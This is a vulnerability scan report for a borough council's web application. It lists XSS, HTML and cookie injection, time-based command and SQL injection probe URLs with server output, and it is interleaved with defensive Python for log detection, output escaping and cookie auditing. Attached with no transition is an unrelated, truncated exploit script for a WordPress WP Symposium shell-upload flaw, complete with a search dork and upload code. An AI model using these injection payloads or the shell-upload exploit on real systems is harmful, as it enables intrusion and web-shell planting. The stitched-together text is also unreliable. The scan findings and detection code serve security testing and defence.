Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3

Description:
 This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed on the victims browser, within the context of
that user and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a Phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html

Solution:
 Validate all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) against expected Type,
Length and where possible, Format and Range characteristics. Reject
any data that fails validation.
Sanitise all user controllable input data (hidden fields, URL
parameters, Cookie values, HTTP headers etc) by converting potentially
dangerous characters (listed below) into HTML entities such as > < etc
using output encoding.
By combining proper input validation with effective input sanitisation
and output encoding, Cross Site Scripting vulnerabilities will be
mitigated.
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
[9] / (forward slash)
[10] | (pipe)
[11] [] (square brackets)
[12] : (colon)

Information
URI: /pages/preview.php
Parameter: sort (GET)
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>

Vulnerability: 44967
Name: CGI Generic Command Execution (time-based)
Type: CGI abuses
Asset Group:  Multiple
Source: SureCloud Vulnerability Scan
IP Address
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5

Description:
 The remote web server hosts CGI scripts that fail to adequately
sanitize request strings. By leveraging this issue, an attacker may be
able to execute arbitrary commands on the remote host.
Note that this script uses a time-based detection method which is less
reliable than the basic method.

Solution:
 Restrict access to the vulnerable application. Contact the
vendor for a patch or upgrade.

Information:
 Using the GET HTTP method, Nessus found that:

+ The following resources may be vulnerable to arbitrary command
execution (time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :

/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%26%20ping%20-n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20-n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20-n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%20ping%20-n%203%20127.0.0.1%20%7C

References:
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 74
CWE: 77
CWE: 78

------------------------------------------------------------------------------------------------------
Vulnerability: 43160
Name: CGI Generic SQL Injection (blind, time based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5

Description
 By sending specially crafted parameters to one or more CGI scripts
hosted on the remote web server, Nessus was able to get a slower
response, which suggests that it may have been able to modify the
behavior of the application and directly access the underlying
database.
An attacker may be able to exploit this issue to bypass
authentication, read confidential data, modify the remote database, or
even take control of the remote operating system.
Note that this script is experimental and may be prone to false positives.

Solution:
 Modify the affected CGI scripts so that they properly escape arguments.

Information:
 Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to blind SQL injection
(time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20--%20
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);

Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='

References
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 751
CWE: 77
CWE: 801
CWE: 810
CWE: 89
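The command-injection and blind-SQL-injection findings above both rely on timing probes (sleep, ping -n, SLEEP(), WAITFOR DELAY, pg_sleep). The Python below is an added example, not part of the scan report, that detects those probe shapes in web-server access logs so that scanner traffic, or anyone repeating it, shows up in monitoring; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Time-based probe signatures. SQL delays cover MySQL SLEEP(), PostgreSQL
# pg_sleep() and MSSQL WAITFOR DELAY; shell delays cover sleep/ping chained
# with a shell metacharacter (; | &), which is what the scan above sent.
SQL_DELAY = re.compile(
    r"sleep\s*\(\s*\d+\s*\)|waitfor\s+delay\s+'[\d:]+'", re.IGNORECASE)
SHELL_DELAY = re.compile(
    r"[;|&]\s*(?:sleep\s+\d+|ping\s+-n\s+\d+)", re.IGNORECASE)

# Common log format: client, identity, user, [timestamp], "request", status, size
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)')


def classify_value(value):
    """Return 'sqli-time', 'cmdi-time' or None for one decoded parameter value."""
    if SQL_DELAY.search(value):
        return "sqli-time"
    if SHELL_DELAY.search(value):
        return "cmdi-time"
    return None


def query_params(query):
    """Split a raw query string into decoded (name, value) pairs.

    Done by hand rather than with parse_qsl so that a ';' inside a probe is
    never treated as a pair separator (older parse_qsl versions do that) and
    pairs without '=' are still inspected.
    """
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def scan_line(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    findings = []
    for name, value in query_params(target.query):
        # Decode a second time so a double-encoded probe is still caught.
        kind = classify_value(value) or classify_value(unquote_plus(value))
        if kind:
            findings.append({
                "client": m.group("client"),
                "time": m.group("ts"),
                "path": target.path,
                "param": name,
                "kind": kind,
                "value": value,
            })
    return findings


def scan_log(text):
    """Scan a whole log (one request per line) and return all findings in order."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


def summarize(text):
    """Count findings per client and probe kind: {client: {kind: n}}."""
    summary = {}
    for f in scan_log(text):
        per_client = summary.setdefault(f["client"], {})
        per_client[f["kind"]] = per_client.get(f["kind"], 0) + 1
    return summary


# Constructed sample log (addresses from the documentation ranges); the probe
# values are the ones the scan above reports for /pages/themes.php.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2014:01:53:08 +0000] "GET /pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26 HTTP/1.1" 200 1834
203.0.113.7 - - [11/Nov/2014:01:53:12 +0000] "GET /pages/themes.php?lastlevelchange=%7C%7C%20ping%20-n%203%20127.0.0.1%20%26 HTTP/1.1" 200 1834
203.0.113.7 - - [11/Nov/2014:01:54:01 +0000] "GET /pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)=' HTTP/1.1" 200 1834
203.0.113.7 - - [11/Nov/2014:01:54:05 +0000] "GET /pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3'; HTTP/1.1" 200 1834
203.0.113.7 - - [11/Nov/2014:01:54:09 +0000] "GET /pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3); HTTP/1.1" 200 1834
198.51.100.4 - - [11/Nov/2014:02:10:00 +0000] "GET /pages/themes.php?lastlevelchange=name HTTP/1.1" 200 1834
198.51.100.4 - - [11/Nov/2014:02:10:03 +0000] "GET /pages/preview.php?sort=DESC&order_by=title HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(time)s %(client)s %(kind)s %(path)s param=%(param)s value=%(value)r" % f)
    print(summarize(SAMPLE_LOG))
```

Because the probes are matched on the decoded parameter value rather than on the raw URL, a %-encoded or double-encoded variant of the same payload is reported the same way.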

–---------------------------------------------------------------------------------------------------------------

Vulnerability: 55903
Name: CGI Generic XSS (extended patterns)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 4.3

Description
 The remote web server hosts one or more CGI scripts that fail to
adequately sanitize request strings with malicious JavaScript. By
leveraging this issue, an attacker may be able to cause arbitrary HTML
and script code to be executed in a user's browser within the security
context of the affected site. These XSS vulnerabilities are likely to
be 'non-persistent' or 'reflected'.

Solution
 Restrict access to the vulnerable application. Contact the vendor for
a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross-site scripting (extended patterns) :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>
------------------------
/pages/preview.php?sort=&sort=504%20onerror="alert(504);
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>
------------------------
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=504%20onerror="alert(504);
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=DESC&archive=&k=">< Back to resource view</a>
------------------------
/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=DESC&archive=&k=">< Back to resource view</a>
------------------------
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>
------------------------
/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_by=&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>
------------------------
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=&archive=&k=">< Back to resource view</a>
------------------------
Tonbridge & Malling Borough Council Vulnerabilities Report | 5
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert(504);&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=&archive=&k=">< Back to resource view</a>
------------------------
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=504%20onerror="alert(504);
/pages/preview.php?order_by=504%20onerror="alert(504);
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86

–----------------------------------------------------------------------------------------------------

Vulnerability: 49067
Name: CGI Generic HTML Injections (quick test)
Type: CGI abuses : XSS
 Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML to be executed
in a user's browser within the security context of the affected site.
The remote web server may be vulnerable to IFRAME injections or
cross-site scripting attacks :
- IFRAME injections allow 'virtual defacement' that
might scare or anger gullible users. Such injections
are sometimes implemented for 'phishing' attacks.
- XSS are extensively tested by four other scripts.
- Some applications (e.g. web forums) authorize a subset
of HTML without any ill effect. In this case, ignore
this warning.

Solution
Either restrict access to the vulnerable application or contact the
vendor for an update.

Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to HTML injection :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<"jfunqd >&archive=&k=">< Back to resource view</a>
------------------------
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<"jfunqd%20>
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<"jfunqd >&sort=DESC&archive=&k=">< Back to resource view</a>
------------------------
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<"jfunqd >&archive=&k=">< Back to resource view</a>
------------------------
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<"jfunqd >&sort=&archive=&k=">< Back to resource view</a>
------------------------
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=<"jfunqd%20>
/pages/preview.php?order_by=<"jfunqd%20>

References
CWE: 80
CWE: 86

–---------------------------------------------------------------------------------------------------
Vulnerability: SC­1628
Name: SSL cookie without secure flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )

Resolution Effort: 1
Description
 If the secure flag is not set, then the cookie will be transmitted in
clear-text if the user visits any non-SSL
(HTTP) URLs within the cookie's scope.
Solution
 The secure flag should be set on all cookies that are used for
transmitting sensitive data when accessing
content over HTTPS.
If cookies are used to transmit session tokens, then areas of the
application that are accessed over HTTPS
should employ their own session handling mechanism, and the session
tokens used should never be
transmitted over unencrypted communications.
Information

URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT
URI: /pages/search.php
Other Info: display=thumbs; httponly
URI: /pages/themes.php
Other Info: saved_themes_order_by=name; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:08 GMT; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:54:30 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:07 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:54:25 GMT; httponly

–-------------------------------------------------------------------------------

Vulnerability: 44136
Name: CGI Generic Cookie Injection Scripting
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts at least one CGI script that fails to
adequately sanitize request strings with malicious JavaScript.
By leveraging this issue, an attacker may be able to inject arbitrary
cookies. Depending on the structure of the web application, it may be
possible to launch a 'session fixation' attack using this mechanism.
Please note that :
- Nessus did not check if the session fixation attack is
feasible.
- This is not the only vector of session fixation.

Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cookie manipulation :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script>
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbsp;Back to resource view</a>
------------------------
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</script>
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbsp;Back to resource view</a>
------------------------
References
CWE: 472
CWE: 642
CWE: 715
CWE: 722

–--------------------------------------------------------------------------------------------

Vulnerability: 39466
Name: CGI Generic XSS (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML and script code
to be executed in a user's browser within the security context of the
affected site.
These XSS are likely to be 'non persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross-site scripting (quick test) :
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<IMG SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to resource view</a>
------------------------
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);">
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<IMG SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to resource view</a>
------------------------
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resource view</a>
------------------------
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
-------- output --------
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resource view</a>
------------------------

References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
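The four CGI findings above (XSS with extended patterns, HTML injection, cookie injection and the quick XSS test) share one root cause: the 'sort', 'order_by' and similar query values are concatenated raw into the href of the application's 'Back to resource view' link. The Python below is an added example, not code from the report or from the affected application, contrasting that construction with an allowlisted, URL-encoded and HTML-escaped version; the FIELDS tuple mirrors the link in the scan output, and the ORDER_BY_ALLOWED column names are an assumption.

```python
import html
from urllib.parse import urlencode

# Fields the back link carries, in the order the scan output shows them.
FIELDS = ("ref", "search", "offset", "order_by", "sort", "archive", "k")

# Allowlists for the two ordering parameters. The column names are an
# assumption for this example, not the application's real list.
ORDER_BY_ALLOWED = {"title", "date", "resourceid"}
SORT_ALLOWED = {"ASC", "DESC"}

LINK = '<a class="enterLink" href="%s">&nbsp;Back to resource view</a>'


def back_link_unsafe(params):
    """The pattern the scan output exposes: raw request values dropped into href.

    A value such as  504 onerror="alert(504);  terminates the href attribute
    and starts a new one, which is exactly what the findings above show.
    """
    query = "&".join("%s=%s" % (name, params.get(name, "")) for name in FIELDS)
    return LINK % ("/pages/view.php?" + query)


def normalise_ordering(params):
    """Ordering parameters only ever take known values, so validate by allowlist."""
    cleaned = dict(params)
    if cleaned.get("order_by") not in ORDER_BY_ALLOWED:
        cleaned["order_by"] = ""
    sort = str(cleaned.get("sort", "")).upper()
    cleaned["sort"] = sort if sort in SORT_ALLOWED else ""
    return cleaned


def back_link_safe(params):
    """Allowlist what can be allowlisted, URL-encode every value, then HTML-escape
    the whole attribute value (quote=True also escapes the double quote)."""
    cleaned = normalise_ordering(params)
    query = urlencode([(name, cleaned.get(name, "")) for name in FIELDS])
    return LINK % html.escape("/pages/view.php?" + query, quote=True)


def href_value(anchor):
    """Extract what the browser will see as the href attribute value."""
    start = anchor.index('href="') + len('href="')
    end = anchor.index('">&nbsp;Back to resource view</a>')
    return anchor[start:end]


def href_is_intact(anchor):
    """True when nothing inside href can close the attribute or open a tag."""
    return not any(c in href_value(anchor) for c in '"<>')


# Constructed request parameters built from the probe values the scan recorded.
PROBE = {
    "search": '<IMG SRC="javascript:alert(104);">',
    "order_by": "title",
    "sort": '504 onerror="alert(504);',
}

if __name__ == "__main__":
    print("unsafe:", back_link_unsafe(PROBE))
    print("safe:  ", back_link_safe(PROBE))
```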

–--------------------------------------------------------------------------------------------------------------

Also issues to be aware of:

Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
 When the HttpOnly attribute is set on a cookie, the cookie's value
cannot be read or set by client-side JavaScript.
HttpOnly prevents certain client-side attacks, such as Cross Site
Scripting (XSS), from capturing the cookie's value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.
Solution
 HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access to cookie contents
(which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting - any XSS vulnerabilities identified must
still be fixed.
Information
 URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT

–-------------------------------------------------------------------------------

Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/http:80
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1

Description
 When the HttpOnly attribute is set on a cookie, the cookie's value
cannot be read or set by client-side JavaScript.
HttpOnly prevents certain client-side attacks, such as Cross Site
Scripting (XSS), from capturing the cookie's value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.

Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access to cookie contents
(which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting - any XSS vulnerabilities identified must
still be fixed.

Information
 URI: /pages/collection_share.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:42 GMT
URI: /pages/contactsheet_settings.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:38 GMT
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:05 GMT
URI: /pages/preview.php
Other Info: thumbs=hide; expires=Tue, 08-Aug-2017 01:57:55 GMT
URI: /pages/resource_email.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:57:42 GMT
URI: /pages/view.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:57:45 GMT
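To turn the two cookie findings (SC-1628, missing Secure flag; SC-1629, missing HttpOnly flag) into a repeatable check, the Python below, an added example rather than part of the report, parses Set-Cookie values like the 'Other Info' lines above, reports the missing flags per URI, and shows how a correctly flagged cookie is emitted with the standard library; the observation list is constructed from the report's entries.

```python
from http.cookies import SimpleCookie


def parse_set_cookie(value):
    """Split a Set-Cookie header value into (cookie name, {attribute: value}).

    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to ''.
    """
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit(observations):
    """observations: iterable of (scheme, uri, set_cookie_value) as a scanner records them.

    Returns (uri, cookie name, issue) tuples. Secure is demanded for cookies set
    over HTTPS, mirroring SC-1628; HttpOnly is expected everywhere (SC-1629).
    """
    findings = []
    for scheme, uri, raw in observations:
        name, attrs = parse_set_cookie(raw)
        if scheme == "https" and "secure" not in attrs:
            findings.append((uri, name, "missing Secure"))
        if "httponly" not in attrs:
            findings.append((uri, name, "missing HttpOnly"))
    return findings


def hardened_set_cookie(name, value, max_age=None):
    """Emit a Set-Cookie value carrying the flags the report asks for."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = "/"
    jar[name]["secure"] = True      # only sent over HTTPS (SC-1628)
    jar[name]["httponly"] = True    # hidden from document.cookie (SC-1629)
    jar[name]["samesite"] = "Lax"   # Python 3.8+; also limits cross-site sending
    if max_age is not None:
        jar[name]["max-age"] = max_age
    return jar[name].OutputString()


# Constructed observations, transcribed from the 'Other Info' lines of the two findings.
OBSERVED = [
    ("https", "/pages/help.php", "thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT"),
    ("https", "/pages/search.php", "display=thumbs; httponly"),
    ("https", "/pages/themes.php", "saved_themes_order_by=name; httponly"),
    ("https", "/pages/user_password.php",
     "starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:08 GMT; httponly"),
    ("http", "/pages/preview.php", "thumbs=hide; expires=Tue, 08-Aug-2017 01:57:55 GMT"),
]

if __name__ == "__main__":
    for uri, cookie, issue in audit(OBSERVED):
        print("%-28s %-22s %s" % (uri, cookie, issue))
    print("hardened:", hardened_set_cookie("thumbs", "show", max_age=86400 * 30))
```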
            
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27:  Discovered vulnerability
# 2014-12-01:  Vendor Notification (Twitter)
# 2014-12-02:  Vendor Notification (Web Site) 
# 2014-12-04:  Vendor Notification (E-mail)
# 2014-12-11:  No Response/Feedback
# 2014-12-11:  Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
#   if ($_FILES["file"]["error"] > 0) {
#       echo "Error: " . $_FILES["file"]["error"] . "<br>";
#   } else {
#       $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
#       //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
#       $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
#       //echo "Extension: " . $ext . "<br />";
#       if (strpos($allowedExts, $ext)) {
#       $extAllowed = true;
#       } else {
#           $extAllowed = false;
#       }
#       //echo "Type: " . $_FILES["file"]["type"] . "<br>";
#       //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
#       //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
#       if (!$extAllowed) {
#           echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
#       } else {
#           // Copy file to tmp location
#   ...
#   ...
#   ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are located in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):

   getfields = dict()
   getfields['uploader_uid'] = '1'
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
